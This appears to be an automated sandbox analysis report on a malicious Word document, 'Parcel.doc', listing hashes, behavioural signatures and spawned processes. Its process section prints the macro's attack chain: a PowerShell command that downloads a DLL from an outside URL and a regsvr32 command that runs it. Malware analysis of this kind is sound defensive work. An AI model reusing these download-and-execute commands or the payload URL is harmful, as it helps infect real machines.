Analysis
- max time kernel: 138s
- max time network: 136s
- platform: windows10_x64
- resource: win10v200430
- submitted: 07-07-2020 12:18
- Static task: static1
- Behavioral task: behavioral1 (Sample: Parcel.doc, Resource: win7)
- Behavioral task: behavioral2 (Sample: Parcel.doc, Resource: win10v200430)
General
- Target: Parcel.doc
- Size: 153KB
- MD5: fa02ac2e4a3f00acdaa60c359afcfdd9
- SHA1: f2917cf0b679650c3a679381f4d34bd1e12674c0
- SHA256: 798868c3e5106b388a0ff01e3f5894fe6d5abfa0789d9efae9b3fe0d0d0db7e6
- SHA512: 81f9ec1e2b59189e2e6a3fdfbd8b7e33dec15ff4d41ae57884efde51af247fbf53065d0275a8bbe19e235893d905a52de3ba1a310756b54052ca6567a157178d
Malware Config
- Extracted: http://tattooartcreations.com/wp-includes/js/tinymce/themes/inlite/crypt_da11.dll
Signatures
- Process spawned unexpected child process (2 IoCs)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: powershell.exe, regsvr32.exe
  description | pid | pid_target | process | target process
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 1984 | 1620 | powershell.exe | WINWORD.EXE
  Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process | 3192 | 1620 | regsvr32.exe | WINWORD.EXE
- Suspicious use of WriteProcessMemory (4 IoCs)
  Processes: WINWORD.EXE
  description | pid | process | target process
  PID 1620 wrote to memory of 1984 | 1620 | WINWORD.EXE | powershell.exe (listed 2 times)
  PID 1620 wrote to memory of 3192 | 1620 | WINWORD.EXE | regsvr32.exe (listed 2 times)
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes: powershell.exe
  pid | process
  1984 | powershell.exe (listed 3 times)
- Blacklisted process makes network request (1 IoC)
  Processes: powershell.exe
  flow | pid | process
  16 | 1984 | powershell.exe
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | WINWORD.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes: WINWORD.EXE
  pid | process
  1620 | WINWORD.EXE (listed 2 times)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes: powershell.exe
  description | pid | process
  Token: SeDebugPrivilege | 1984 | powershell.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: WINWORD.EXE
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | WINWORD.EXE
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | WINWORD.EXE
- Suspicious use of SetWindowsHookEx (9 IoCs)
  Processes: WINWORD.EXE
  pid | process
  1620 | WINWORD.EXE (listed 9 times)
Processes
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE (PID 1620)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Parcel.doc" /o ""
  - Suspicious use of WriteProcessMemory
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Checks processor information in registry
  - Suspicious use of SetWindowsHookEx
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1984, child of WINWORD.EXE)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "& {(New-Object Net.WebClient).DownloadFile('http://tattooartcreations.com/wp-includes/js/tinymce/themes/inlite/crypt_da11.dll','C:\Users\Admin\AppData\Roaming\filename.dll')}"
    - Process spawned unexpected child process
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\regsvr32.exe (PID 3192, child of WINWORD.EXE)
    Command line: "C:\Windows\System32\regsvr32.exe" C:\Users\Admin\AppData\Roaming\filename.dll,DllRegisterServer
    - Process spawned unexpected child process